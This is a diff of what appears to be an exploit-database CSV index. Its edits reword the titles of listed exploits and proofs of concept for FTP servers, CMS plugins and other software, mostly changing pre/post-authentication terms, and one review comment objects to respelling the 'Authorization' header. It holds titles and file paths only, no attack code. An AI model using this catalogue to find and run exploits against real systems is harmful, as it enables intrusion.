-11468,platforms/windows/remote/11468.py,"Easy~Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow",2010-02-15,dookie,windows,remote,21
-11469,platforms/windows/dos/11469.py,"Easy~Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow (SEH) (PoC)",2010-02-15,loneferret,windows,dos,0
-11470,platforms/windows/dos/11470.py,"Easy~Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow (PoC)",2010-02-15,loneferret,windows,dos,0
+11468,platforms/windows/remote/11468.py,"Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow",2010-02-15,dookie,windows,remote,21
+11469,platforms/windows/dos/11469.py,"Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow (SEH) (PoC)",2010-02-15,loneferret,windows,dos,0
+11470,platforms/windows/dos/11470.py,"Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow (PoC)",2010-02-15,loneferret,windows,dos,0
 11472,platforms/ios/dos/11472.py,"iOS FTP On The Go 2.1.2 - HTTP Remote Denial of Service",2010-02-15,TecR0c,ios,dos,0
 11473,platforms/php/webapps/11473.txt,"Pogodny CMS - SQL Injection",2010-02-16,Ariko-Security,php,webapps,0
 11474,platforms/php/webapps/11474.txt,"Mambo Component com_acnews - [id] SQL Injection",2010-02-16,"Zero Bits and Xzit3",php,webapps,0
@@ -10733,16 +10732,16 @@ id,file,description,date,author,platform,type,port
 11731,platforms/php/webapps/11731.html,"RogioBiz PHP Fle Manager 1.2 - Admin Bypass",2010-03-14,ITSecTeam,php,webapps,0
 11732,platforms/php/webapps/11732.txt,"PHP-Nuke - Local File Inclusion",2010-03-14,ITSecTeam,php,webapps,0
 11733,platforms/php/webapps/11733.txt,"PHPpool media Domain Verkaufs und Auktions Portal - 'index.php' SQL Injection",2010-03-14,"Easy Laster",php,webapps,0
-11734,platforms/windows/dos/11734.py,"httpdx 1.5.3b - Multiple Remote Pre-Authentication Denial of Service (PoC)",2010-03-14,loneferret,windows,dos,0
+11734,platforms/windows/dos/11734.py,"httpdx 1.5.3b - Multiple Remote Unauthenticated Denial of Service (PoC)",2010-03-14,loneferret,windows,dos,0
 11735,platforms/php/webapps/11735.php,"DZCP (deV!L_z Clanportal) 1.5.2 - Remote File Inclusion",2010-03-14,"cr4wl3r ",php,webapps,0
 18428,platforms/php/webapps/18428.txt,"HostBill App 2.3 - Remote Code Injection",2012-01-30,Dr.DaShEr,php,webapps,0
-11736,platforms/linux/dos/11736.py,"Kerio MailServer 6.2.2 - Pre-Authentication Remote Denial of Service (PoC)",2006-12-14,"Evgeny Legerov",linux,dos,389
+11736,platforms/linux/dos/11736.py,"Kerio MailServer 6.2.2 - Unauthenticated Remote Denial of Service (PoC)",2006-12-14,"Evgeny Legerov",linux,dos,389
 11737,platforms/php/webapps/11737.txt,"PhpMyLogon 2.0 - SQL Injection",2010-03-14,blake,php,webapps,0
 11738,platforms/php/webapps/11738.txt,"Joomla Component com_gcalendar Suite 2.1.5 - Local File Inclusion",2010-03-15,jdc,php,webapps,0
 11739,platforms/php/webapps/11739.txt,"PHP Classifieds 7.5 - Blind SQL Injection",2010-03-15,ITSecTeam,php,webapps,0
 11740,platforms/php/webapps/11740.txt,"Ninja RSS Syndicator 1.0.8 - Local File Inclusion",2010-03-15,jdc,php,webapps,0
 11741,platforms/php/webapps/11741.txt,"Phenix 3.5b - SQL Injection",2010-03-15,ITSecTeam,php,webapps,0
-11742,platforms/windows/remote/11742.rb,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Buffer Overflow (Metasploit)",2010-03-15,blake,windows,remote,0
+11742,platforms/windows/remote/11742.rb,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Buffer Overflow (Metasploit)",2010-03-15,blake,windows,remote,0
 11743,platforms/php/webapps/11743.txt,"Joomla Component com_rpx Ulti RPX 2.1.0 - Local File Inclusion",2010-03-15,jdc,php,webapps,0
 11744,platforms/php/webapps/11744.txt,"Duhok Forum 1.0 script - Cross-Site Scripting",2010-03-15,indoushka,php,webapps,0
 11745,platforms/php/webapps/11745.txt,"FreeHost 1.00 - Arbitrary File Upload",2010-03-15,indoushka,php,webapps,0
@@ -10802,15 +10801,15 @@ id,file,description,date,author,platform,type,port
 11806,platforms/php/webapps/11806.txt,"nensor CMS 2.01 - Multiple Vulnerabilities",2010-03-18,"cr4wl3r ",php,webapps,0
 11807,platforms/php/webapps/11807.txt,"SOFTSAURUS 2.01 - Multiple Remote File Inclusion",2010-03-18,"cr4wl3r ",php,webapps,0
 11808,platforms/php/webapps/11808.txt,"quality point 1.0 newsfeed - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2010-03-19,Red-D3v1L,php,webapps,0
-11809,platforms/windows/dos/11809.py,"eDisplay Personal FTP server 1.0.0 - Pre-Authentication Denial of Service (PoC)",2010-03-19,loneferret,windows,dos,21
-11810,platforms/windows/dos/11810.py,"eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Crash SEH (PoC)",2010-03-19,loneferret,windows,dos,21
+11809,platforms/windows/dos/11809.py,"eDisplay Personal FTP server 1.0.0 - Unauthenticated Denial of Service (PoC)",2010-03-19,loneferret,windows,dos,21
+11810,platforms/windows/dos/11810.py,"eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Crash SEH (PoC)",2010-03-19,loneferret,windows,dos,21
 11811,platforms/php/webapps/11811.txt,"PHPscripte24 Preisschlacht Liveshop System SQL Injection - (seite&aid) index.php",2010-03-19,"Easy Laster",php,webapps,0
 11813,platforms/php/webapps/11813.txt,"DirectAdmin 1.34.4 - Multi Cross-Site Request Forgery",2010-03-19,K053,php,webapps,0
 11814,platforms/php/webapps/11814.txt,"joomla Component & plugin JE Tooltip 1.0 - Local File Inclusion",2010-03-19,"Chip d3 bi0s",php,webapps,0
 11815,platforms/php/webapps/11815.txt,"joomla Component Gift Exchange com_giftexchange 1.0 Beta - (pkg) SQL Injection",2010-03-20,"Chip d3 bi0s",php,webapps,0
 11816,platforms/php/webapps/11816.txt,"Pay Per Watch & Bid Auktions System - (id_auk) auktion.php Blind SQL Injection",2010-03-20,"Easy Laster",php,webapps,0
 11817,platforms/multiple/remote/11817.txt,"KDE 4.4.1 - Ksysguard Remote Code Execution via Cross Application Scripting",2010-03-20,emgent,multiple,remote,0
-11820,platforms/windows/remote/11820.pl,"eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack Buffer Overflow (1)",2010-03-20,corelanc0d3r,windows,remote,0
+11820,platforms/windows/remote/11820.pl,"eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (1)",2010-03-20,corelanc0d3r,windows,remote,0
 11822,platforms/hardware/remote/11822.txt,"ZKSoftware Biometric Attendence Managnmnet Hardware[MIPS] 2 - Improper Authentication",2010-03-20,fb1h2s,hardware,remote,0
 11823,platforms/cgi/webapps/11823.txt,"Trouble Ticket Software - ttx.cgi Remote File Download",2010-03-20,n01d,cgi,webapps,0
 11824,platforms/php/webapps/11824.py,"Woltlab Burning Board Teamsite Hack 3.0 - ts_other.php SQL Injection",2010-03-21,"Easy Laster",php,webapps,0
@@ -10859,7 +10858,7 @@ id,file,description,date,author,platform,type,port
 11874,platforms/php/webapps/11874.txt,"INVOhost - SQL Injection",2010-03-25,"Andrés Gómez",php,webapps,0
 11875,platforms/php/webapps/11875.py,"Easy-Clanpage 2.01 - SQL Injection",2010-03-25,"Easy Laster",php,webapps,0
 11876,platforms/php/webapps/11876.txt,"justVisual 2.0 - 'index.php' Local File Inclusion",2010-03-25,eidelweiss,php,webapps,0
-11877,platforms/windows/remote/11877.py,"eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack Buffer Overflow (2)",2010-03-25,sud0,windows,remote,21
+11877,platforms/windows/remote/11877.py,"eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (2)",2010-03-25,sud0,windows,remote,21
 11878,platforms/windows/dos/11878.py,"Cisco TFTP Server 1.1 - Denial of Service",2010-03-25,_SuBz3r0_,windows,dos,69
 11879,platforms/windows/remote/11879.txt,"SAP GUI 7.00 - BExGlobal Active-X unsecure method",2010-03-25,"Alexey Sintsov",windows,remote,0
 11880,platforms/hardware/dos/11880.txt,"Lexmark Multiple Laser printers - Remote Stack Overflow",2010-03-25,"Francis Provencher",hardware,dos,0
@@ -10971,7 +10970,7 @@ id,file,description,date,author,platform,type,port
 12007,platforms/php/webapps/12007.txt,"SimpNews 2.16.2 - Multiple SQL Injections",2010-04-01,NoGe,php,webapps,0
 12008,platforms/windows/local/12008.pl,"TugZip 3.5 - '.ZIP' File Buffer Overflow",2010-04-01,Lincoln,windows,local,0
 12009,platforms/php/webapps/12009.html,"CMS Made Simple 1.7 - Cross-Site Request Forgery",2010-04-02,"pratul agrawal",php,webapps,0
-12010,platforms/windows/dos/12010.pl,"uTorrent WebUI 0.370 - Authorization header Denial of Service",2010-04-02,"zombiefx darkernet",windows,dos,0
+12010,platforms/windows/dos/12010.pl,"uTorrent WebUI 0.370 - Authorisation Header Denial of Service",2010-04-02,"zombiefx darkernet",windows,dos,0
 12011,platforms/windows/dos/12011.txt,"Google Chrome 4.1 - OOB Array Indexing Bug",2010-04-02,"Tobias Klein",windows,dos,0
 12012,platforms/windows/local/12012.txt,"Free MP3 CD Ripper 2.6 - Exploit (2)",2010-04-02,"Richard leahy",windows,local,0
 12015,platforms/php/webapps/12015.txt,"Joomla Component com_menu - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0
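Review bot: The new title for row 12010 respells a protocol identifier: the HTTP request header is named `Authorization`, and the row now reads `Authorisation Header`. Anyone triaging exposure by searching this index for the literal header name will no longer match the entry. Normalising capitalisation is fine, but the field name should stay as the protocol spells it, e.g. `"uTorrent WebUI 0.370 - 'Authorization' Header Denial of Service"`.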
@@ -11000,7 +10999,7 @@ id,file,description,date,author,platform,type,port
 12041,platforms/php/webapps/12041.txt,"Solutive CMS - SQL Injection",2010-04-04,"Th3 RDX",php,webapps,0
 12042,platforms/php/webapps/12042.txt,"x10 mirco blogging 121 - SQL Injection",2010-04-04,ITSecTeam,php,webapps,0
 12043,platforms/php/webapps/12043.html,"Prediction League 0.3.8 - Cross-Site Request Forgery (Create Admin User) Exploit",2010-04-04,indoushka,php,webapps,0
-12044,platforms/windows/remote/12044.c,"Easy Ftp Server 1.7.0.2 - MKD Remote Post-Authentication Buffer Overflow",2010-04-04,x90c,windows,remote,0
+12044,platforms/windows/remote/12044.c,"Easy Ftp Server 1.7.0.2 - MKD Remote Authenticated Buffer Overflow",2010-04-04,x90c,windows,remote,0
 12045,platforms/php/webapps/12045.html,"MunkyScripts Simple Gallery - SQL Injection",2010-04-04,ITSecTeam,php,webapps,0
 12047,platforms/php/webapps/12047.html,"nodesforum 1.033 - Remote File Inclusion",2010-04-04,ITSecTeam,php,webapps,0
 12048,platforms/php/webapps/12048.html,"ttCMS 5.0 - Remote File Inclusion",2010-04-04,ITSecTeam,php,webapps,0
@@ -11405,7 +11404,7 @@ id,file,description,date,author,platform,type,port
 12492,platforms/windows/dos/12492.html,"Firefox 3.6.3 - Fork Bomb Denial of Service",2010-05-03,Dr_IDE,windows,dos,0
 12493,platforms/multiple/dos/12493.html,"All Browsers - Long Unicode Denial of Service (PoC)",2010-05-03,Dr_IDE,multiple,dos,0
 12494,platforms/windows/dos/12494.pl,"Winamp 5.572 - Local Crash (PoC)",2010-05-03,R3d-D3V!L,windows,dos,0
-12495,platforms/windows/remote/12495.pl,"ProSSHD 1.2 - Remote Post-Authentication Exploit (ASLR + DEP Bypass)",2010-05-03,"Alexey Sintsov",windows,remote,0
+12495,platforms/windows/remote/12495.pl,"ProSSHD 1.2 - Remote Authenticated Exploit (ASLR + DEP Bypass)",2010-05-03,"Alexey Sintsov",windows,remote,0
 12496,platforms/php/webapps/12496.html,"KubeBlog - Cross-Site Request Forgery",2010-05-03,The.Morpheus,php,webapps,0
 12497,platforms/windows/local/12497.c,"PhotoFiltre Studio X - '.tif' Local Buffer Overflow (PoC)",2010-05-04,"fl0 fl0w",windows,local,0
 12498,platforms/windows/remote/12498.txt,"VicFTPS 5.0 - Directory Traversal",2010-05-04,chr1x,windows,remote,0
@@ -11582,7 +11581,7 @@ id,file,description,date,author,platform,type,port
 12686,platforms/php/webapps/12686.txt,"Online University - (Authentication Bypass) SQL Injection",2010-05-21,"cr4wl3r ",php,webapps,0
 12687,platforms/windows/dos/12687.pl,"WinDirectAudio 1.0 - '.wav' (PoC)",2010-05-21,ahwak2000,windows,dos,0
 12688,platforms/php/webapps/12688.txt,"JV2 Folder Gallery 3.1 - 'gallery.php' Remote File Inclusion",2010-05-21,"Sn!pEr.S!Te Hacker",php,webapps,0
-12689,platforms/multiple/webapps/12689.txt,"Apache Axis2 Administration console - (Post-Authentication) Cross-Site Scripting",2010-05-21,"Richard Brain",multiple,webapps,0
+12689,platforms/multiple/webapps/12689.txt,"Apache Axis2 Administration console - (Authenticated) Cross-Site Scripting",2010-05-21,"Richard Brain",multiple,webapps,0
 12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - 'FCKeditor' Arbitrary File Upload",2010-05-21,Ma3sTr0-Dz,php,webapps,0
 12691,platforms/php/webapps/12691.txt,"Online Job Board - (Authentication Bypass) SQL Injection",2010-05-21,"cr4wl3r ",php,webapps,0
 14322,platforms/php/webapps/14322.txt,"Edgephp ClickBank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0
@@ -11630,7 +11629,7 @@ id,file,description,date,author,platform,type,port
 12736,platforms/php/webapps/12736.txt,"Website Design and Hosting By Netricks Inc - 'news.php' SQL Injection",2010-05-25,"Dr.SiLnT HilL",php,webapps,0
 12737,platforms/php/webapps/12737.txt,"Simpel Side - 'index2.php' SQL Injection",2010-05-25,MN9,php,webapps,0
 12740,platforms/windows/dos/12740.py,"Webby WebServer - PoC SEH control",2010-05-25,m-1-k-3,windows,dos,0
-12741,platforms/windows/dos/12741.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Universal Pre-Authentication Denial of Service",2010-05-25,Dr_IDE,windows,dos,0
+12741,platforms/windows/dos/12741.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Universal Unauthenticated Denial of Service",2010-05-25,Dr_IDE,windows,dos,0
 12743,platforms/php/webapps/12743.txt,"web5000 - (page_show) SQL Injection",2010-05-25,"BLack Revenge",php,webapps,0
 12744,platforms/php/webapps/12744.txt,"Webit CMS - SQL Injection",2010-05-25,CoBRa_21,php,webapps,0
 12746,platforms/php/webapps/12746.txt,"Spaceacre - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-26,XroGuE,php,webapps,0
@@ -12255,7 +12254,7 @@ id,file,description,date,author,platform,type,port
 13902,platforms/asp/webapps/13902.txt,"Ananda Image Gallery - SQL Injection",2010-06-17,"L0rd CrusAd3r",asp,webapps,0
 13903,platforms/windows/remote/13903.py,"File Sharing Wizard 1.5.0 - (SEH) Exploit",2010-06-17,b0nd,windows,remote,0
 13904,platforms/php/webapps/13904.txt,"Planet 1.1 - [Cross-Site Request Forgery] Add Admin Account",2010-06-17,G0D-F4Th3r,php,webapps,0
-13905,platforms/windows/local/13905.py,"BlazeDVD 5.1 - '.plf' Stack Buffer Overflow (PoC) (Windows 7 ALSR + DEP Bypass)",2010-06-17,mr_me,windows,local,0
+13905,platforms/windows/local/13905.py,"BlazeDVD 5.1 - '.plf' Stack Buffer Overflow (PoC) (Windows 7 ASLR + DEP Bypass)",2010-06-17,mr_me,windows,local,0
 13906,platforms/novell/dos/13906.txt,"Netware - SMB Remote Stack Overflow (PoC)",2010-06-17,"laurent gaffie",novell,dos,139
 13907,platforms/windows/local/13907.py,"Winamp 5.572 - Local Buffer Overflow (EIP & SEH DEP Bypass)",2010-06-17,TecR0c,windows,local,0
 13908,platforms/lin_x86-64/shellcode/13908.c,"Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0
@@ -12582,7 +12581,7 @@ id,file,description,date,author,platform,type,port
 14309,platforms/windows/remote/14309.html,"RSP MP3 Player OCX 3.2 - ActiveX Buffer Overflow",2010-07-09,blake,windows,remote,0
 14308,platforms/php/webapps/14308.txt,"WordPress Firestats Plugin - Remote Configuration File Download",2010-07-09,"Jelmer de Hen",php,webapps,0
 15307,platforms/windows/dos/15307.py,"HP Data Protector Media Operations 6.11 - HTTP Server Remote Integer Overflow Denial of Service",2010-10-23,d0lc3,windows,dos,0
-14310,platforms/php/webapps/14310.js,"dotDefender 3.8-5 - Pre-Authentication Remote Code Execution (via Cross-Site Scripting)",2010-07-09,rAWjAW,php,webapps,80
+14310,platforms/php/webapps/14310.js,"dotDefender 3.8-5 - Unauthenticated Remote Code Execution (via Cross-Site Scripting)",2010-07-09,rAWjAW,php,webapps,80
 14313,platforms/php/webapps/14313.txt,"Joomla MyHome Component (com_myhome) - Blind SQL Injection",2010-07-10,Sid3^effects,php,webapps,0
 14315,platforms/php/webapps/14315.txt,"Joomla MySms Component (com_mysms) - Arbitrary File Upload",2010-07-10,Sid3^effects,php,webapps,0
 14335,platforms/php/webapps/14335.txt,"Joomla Health & Fitness Stats - Persistent Cross-Site Scripting",2010-07-12,Sid3^effects,php,webapps,0
@@ -12650,10 +12649,10 @@ id,file,description,date,author,platform,type,port
 14397,platforms/windows/local/14397.rb,"MoreAmp - Buffer Overflow (SEH) (Metasploit)",2010-07-17,Madjix,windows,local,0
 14404,platforms/php/webapps/14404.txt,"Kayako eSupport 3.70.02 - 'functions.php' SQL Injection",2010-07-18,ScOrPiOn,php,webapps,0
 14405,platforms/php/webapps/14405.txt,"PHP-Fusion - Remote Command Execution",2010-07-18,"ViRuS Qalaa",php,webapps,0
-14399,platforms/windows/remote/14399.py,"Easy FTP Server 1.7.0.11 - (Post-Authentication) 'MKD' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0
-14400,platforms/windows/remote/14400.py,"Easy FTP Server 1.7.0.11 - (Post-Authentication) 'LIST' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0
+14399,platforms/windows/remote/14399.py,"Easy FTP Server 1.7.0.11 - (Authenticated) 'MKD' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0
+14400,platforms/windows/remote/14400.py,"Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0
 14401,platforms/asp/webapps/14401.txt,"ClickAndRank Script - Authentication Bypass",2010-07-18,walid,asp,webapps,0
-14402,platforms/windows/remote/14402.py,"Easy FTP Server 1.7.0.11 - (Post-Authentication) 'CWD' Command Remote Buffer Overflow",2010-07-18,fdiskyou,windows,remote,0
+14402,platforms/windows/remote/14402.py,"Easy FTP Server 1.7.0.11 - (Authenticated) 'CWD' Command Remote Buffer Overflow",2010-07-18,fdiskyou,windows,remote,0
 14403,platforms/windows/local/14403.txt,"Microsoft Windows - Automatic LNK Shortcut File Code Execution",2010-07-18,Ivanlef0u,windows,local,0
 14406,platforms/bsd/local/14406.pl,"Ghostscript - '.PostScript' File Stack Overflow",2010-07-18,"Rodrigo Rubira Branco",bsd,local,0
 14407,platforms/aix/remote/14407.c,"rpc.pcnfsd - Remote Format String",2010-07-18,"Rodrigo Rubira Branco",aix,remote,0
@@ -12693,7 +12692,7 @@ id,file,description,date,author,platform,type,port
 14448,platforms/php/webapps/14448.txt,"Joomla Component (com_golfcourseguide) 0.9.6.0 (Beta) / 1 (Beta) - SQL Injection",2010-07-23,Valentin,php,webapps,0
 14449,platforms/php/webapps/14449.txt,"Joomla Component (com_huruhelpdesk) - SQL Injection",2010-07-23,Amine_92,php,webapps,0
 14450,platforms/php/webapps/14450.txt,"Joomla Component (com_iproperty) - SQL Injection",2010-07-23,Amine_92,php,webapps,0
-14451,platforms/windows/remote/14451.rb,"Easy FTP Server 1.7.0.11 - (Post-Authentication) 'LIST' Command Remote Buffer Overflow (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0
+14451,platforms/windows/remote/14451.rb,"Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0
 14452,platforms/linux/dos/14452.txt,"FTP Client 0.17-19build1 ACCT (Ubuntu 10.04) - Buffer Overflow",2010-07-23,d0lc3,linux,dos,0
 14453,platforms/php/webapps/14453.txt,"PhotoPost PHP 4.6.5 - (ecard.php) SQL Injection",2010-07-23,CoBRa_21,php,webapps,0
 14454,platforms/php/webapps/14454.txt,"ValidForm Builder script - Remote Command Execution",2010-07-23,"HaCkEr arar",php,webapps,0
@@ -12722,7 +12721,7 @@ id,file,description,date,author,platform,type,port
 14484,platforms/windows/dos/14484.html,"Microsoft Internet Explorer 6 / 7 - Remote Denial of Service",2010-07-27,"Richard leahy",windows,dos,0
 14485,platforms/php/webapps/14485.txt,"nuBuilder 10.04.20 - Local File Inclusion",2010-07-27,"John Leitch",php,webapps,0
 14491,platforms/windows/local/14491.txt,"Zemana AntiLogger AntiLog32.sys 1.5.2.755 - Privilege Escalation",2010-07-28,th_decoder,windows,local,0
-14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - (Post-Authentication) HTTP Remote Buffer Overflow",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0
+14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - (Authenticated) HTTP Remote Buffer Overflow",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0
 14497,platforms/windows/local/14497.py,"WM Downloader 3.1.2.2 2010.04.15 - Buffer Overflow (SEH)",2010-07-28,fdiskyou,windows,local,0
 14488,platforms/php/webapps/14488.txt,"joomla Component appointinator 1.0.1 - Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0
 14489,platforms/unix/remote/14489.c,"Apache Tomcat < 6.0.18 - utf8 Directory Traversal (2)",2010-07-28,mywisdom,unix,remote,0
@@ -12819,7 +12818,7 @@ id,file,description,date,author,platform,type,port
 14620,platforms/windows/dos/14620.py,"RightMark Audio Analyzer 6.2.3 - Denial of Service",2010-08-11,"Oh Yaw Theng",windows,dos,0
 14621,platforms/windows/dos/14621.py,"Abac Karaoke 2.15 - Denial of Service",2010-08-11,"Oh Yaw Theng",windows,dos,0
 14622,platforms/php/webapps/14622.txt,"KnowledgeTree 3.5.2 Community Edition - Permanent Cross-Site Scripting",2010-08-11,fdiskyou,php,webapps,0
-14623,platforms/windows/remote/14623.py,"Easy FTP Server 1.7.0.11 - (Post-Authentication) Multiple Commands Remote Buffer Overflow",2010-08-11,"Glafkos Charalambous ",windows,remote,21
+14623,platforms/windows/remote/14623.py,"Easy FTP Server 1.7.0.11 - (Authenticated) Multiple Commands Remote Buffer Overflow",2010-08-11,"Glafkos Charalambous ",windows,remote,21
 14624,platforms/windows/dos/14624.py,"JaMP Player 4.2.2.0 - Denial of Service",2010-08-12,"Oh Yaw Theng",windows,dos,0
 14625,platforms/windows/dos/14625.py,"CombiWave Lite 4.0.1.4 - Denial of Service",2010-08-12,"Oh Yaw Theng",windows,dos,0
 14628,platforms/win_x86/webapps/14628.txt,"PHP-Nuke 8.1 SEO Arabic - Remote File Inclusion",2010-08-12,LoSt.HaCkEr,win_x86,webapps,80
@@ -13185,7 +13184,7 @@ id,file,description,date,author,platform,type,port
 15139,platforms/asp/webapps/15139.txt,"AtomatiCMS - Upload Arbitrary File",2010-09-28,Abysssec,asp,webapps,0
 15141,platforms/php/webapps/15141.txt,"JE CMS 1.0.0 - Authentication Bypass (via SQL Injection)",2010-09-28,Abysssec,php,webapps,0
 15144,platforms/windows/webapps/15144.txt,"Aleza Portal 1.6 - Insecure (SQL Injection) Cookie Handling",2010-09-28,KnocKout,windows,webapps,0
-15145,platforms/php/webapps/15145.txt,"Achievo 1.4.3 - Multiple Authorization Flaws",2010-09-28,"Pablo Milano",php,webapps,0
+15145,platforms/php/webapps/15145.txt,"Achievo 1.4.3 - Multiple Authorisation Flaws",2010-09-28,"Pablo Milano",php,webapps,0
 15146,platforms/php/webapps/15146.txt,"Achievo 1.4.3 - Cross-Site Request Forgery",2010-09-28,"Pablo Milano",php,webapps,0
 15147,platforms/php/webapps/15147.txt,"Micro CMS 1.0 b1 - Persistent Cross-Site Scripting",2010-09-28,"SecPod Research",php,webapps,0
 15148,platforms/windows/dos/15148.txt,"Microsoft Excel - SxView Record Parsing Heap Memory Corruption",2010-09-29,Abysssec,windows,dos,0
@@ -13259,7 +13258,7 @@ id,file,description,date,author,platform,type,port
 15599,platforms/windows/local/15599.py,"Xion Audio Player 1.0.127 - '.m3u' Buffer Overflow",2010-11-23,0v3r,windows,local,0
 15600,platforms/windows/remote/15600.html,"Netcraft Toolbar 1.8.1 - Remote Code Execution",2010-11-23,Rew,windows,remote,0
 15601,platforms/windows/remote/15601.html,"ImageShack Toolbar 4.8.3.75 - Remote Code Execution",2010-11-23,Rew,windows,remote,0
-15602,platforms/php/webapps/15602.txt,"PHPMotion 1.62 - 'FCKeditor' File Upload",2010-11-23,trycyber,php,webapps,0
+15602,platforms/php/webapps/15602.txt,"PHPMotion 1.62 - 'FCKeditor' Arbitrary File Upload",2010-11-23,trycyber,php,webapps,0
 15605,platforms/php/webapps/15605.txt,"Getsimple CMS 2.01 < 2.02 - Administrative Credentials Disclosure",2010-11-24,"Michael Brooks",php,webapps,0
 15229,platforms/windows/dos/15229.pl,"FoxPlayer 2.3.0 - '.m3u' Buffer Overflow",2010-10-10,"Anastasios Monachos",windows,dos,0
 15230,platforms/asp/webapps/15230.txt,"Site2Nite Auto e-Manager - SQL Injection",2010-10-10,KnocKout,asp,webapps,0
@@ -13364,7 +13363,7 @@ id,file,description,date,author,platform,type,port
 15346,platforms/multiple/dos/15346.c,"Platinum SDK Library - post upnp sscanf Buffer Overflow",2010-10-28,n00b,multiple,dos,0
 15347,platforms/windows/remote/15347.py,"XBMC 9.04.1r20672 - soap_action_name post upnp sscanf Buffer Overflow",2010-10-28,n00b,windows,remote,0
 15348,platforms/php/webapps/15348.txt,"Pub-Me CMS - Blind SQL Injection",2010-10-28,H4f,php,webapps,0
-15349,platforms/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - Post-Authentication Directory Traversal",2010-10-29,chr1x,windows,remote,0
+15349,platforms/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - Authenticated Directory Traversal",2010-10-29,chr1x,windows,remote,0
 15350,platforms/php/webapps/15350.rb,"PHPKit 1.6.1 R2 - overview.php SQL Injection",2010-10-29,"Easy Laster",php,webapps,0
 15351,platforms/php/webapps/15351.rb,"mygamingladder MGL Combo System 7.5 - game.php SQL Injection",2010-10-29,"Easy Laster",php,webapps,0
 15352,platforms/windows/remote/15352.html,"Firefox 3.6.8 < 3.6.11 - Interleaving document.write and appendChild Exploit (From the Wild)",2010-10-29,Unknown,windows,remote,0
@@ -13761,7 +13760,7 @@ id,file,description,date,author,platform,type,port
 15839,platforms/windows/dos/15839.php,"Microsoft Windows Fax Services Cover Page Editor - '.cov' Memory Corruption",2010-12-28,rgod,windows,dos,0
 15840,platforms/php/webapps/15840.txt,"ardeaCore 2.25 - PHP Framework Remote File Inclusion",2010-12-29,n0n0x,php,webapps,0
 15842,platforms/hardware/remote/15842.txt,"DD-WRT 24-preSP2 - Information Disclosure",2010-12-29,"Craig Heffner",hardware,remote,0
-15843,platforms/php/webapps/15843.txt,"News Script PHP Pro - 'FCKeditor' File Upload",2010-12-29,Net.Edit0r,php,webapps,0
+15843,platforms/php/webapps/15843.txt,"News Script PHP Pro - 'FCKeditor' Arbitrary File Upload",2010-12-29,Net.Edit0r,php,webapps,0
 15846,platforms/php/webapps/15846.txt,"kaibb 1.0.1 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps,0
 15847,platforms/php/webapps/15847.txt,"DzTube - SQL Injection",2010-12-29,"errnick qwe",php,webapps,0
 15848,platforms/php/webapps/15848.txt,"PHP-AddressBook 6.2.4 - (group.php) SQL Injection",2010-12-29,hiphop,php,webapps,0
@@ -13984,7 +13983,7 @@ id,file,description,date,author,platform,type,port
 16145,platforms/windows/remote/16145.pl,"Unreal Tournament - Remote Buffer Overflow (SEH)",2011-02-09,Fulcrum,windows,remote,0
 16183,platforms/php/webapps/16183.txt,"GAzie 5.10 - (Login Parameter) Multiple Vulnerabilities",2011-02-17,LiquidWorm,php,webapps,0
 16165,platforms/php/webapps/16165.txt,"AWCM 2.2 Final - Persistent Cross-Site Script",2011-02-14,_84kur10_,php,webapps,0
-16166,platforms/windows/dos/16166.py,"Microsoft Windows 2003 - AD Pre-Authentication BROWSER ELECTION Remote Heap Overflow",2011-02-14,Cupidon-3005,windows,dos,0
+16166,platforms/windows/dos/16166.py,"Microsoft Windows 2003 - AD Unauthenticated BROWSER ELECTION Remote Heap Overflow",2011-02-14,Cupidon-3005,windows,dos,0
 16148,platforms/php/webapps/16148.txt,"SourceBans 1.4.7 - Cross-Site Scripting",2011-02-09,Sw1tCh,php,webapps,0
 16149,platforms/hardware/remote/16149.txt,"Linksys WAP610N - Unauthenticated Root Access Security",2011-02-10,"Matteo Ignaccolo",hardware,remote,0
 16150,platforms/windows/dos/16150.py,"XM Easy Personal FTP Server 5.8.0 - (TYPE) Denial of Service",2011-02-10,"Houssam Sahli",windows,dos,0
@@ -14005,7 +14004,7 @@ id,file,description,date,author,platform,type,port
